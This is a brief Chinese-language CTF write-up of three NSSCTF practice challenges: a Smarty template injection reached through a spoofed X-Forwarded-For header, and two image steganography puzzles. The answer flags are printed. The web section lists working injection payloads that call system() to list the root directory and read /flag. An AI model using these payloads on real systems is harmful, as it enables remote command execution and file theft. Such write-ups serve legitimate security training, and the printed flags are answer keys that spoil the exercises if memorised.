[CISCN 2019华东南]Web11 

给了两个链接但是都无法访问

这里我们直接抓包试一下

我们插入X-Forwarded-For:127.0.0.1

发现可以修改了右上角的IP地址，从而可以进行注入

{$smarty.version} 查看版本号

if标签执行PHP命令

{if phpinfo()}{/if} 查看协议

{if system('ls /')}{/if} 找到当前页面的内容发现了有flag文件

{if system('cat /flag')}{/if} 查看flag

NSSCTF{961ca109-7c71-45ec-9c8a-469ab90cbc1e}

[LitCTF 2023]404notfound (初级)

这是一个图片隐写题

下载后得到一个图片，看起来没什么用

先用记事本打开看一下直接就发现了flag

NSSCTF{Its_404_but_1ts_n0t_a_page}

[LitCTF 2023]这羽毛球怎么只有一半啊（恼 (初级)

下载后给了一个图片，让我们找她的下半身，这里吧高度调整就好

直接把这个图片放到 随波逐流就出来了

NSSCTF{Fl4g_0fcourse!}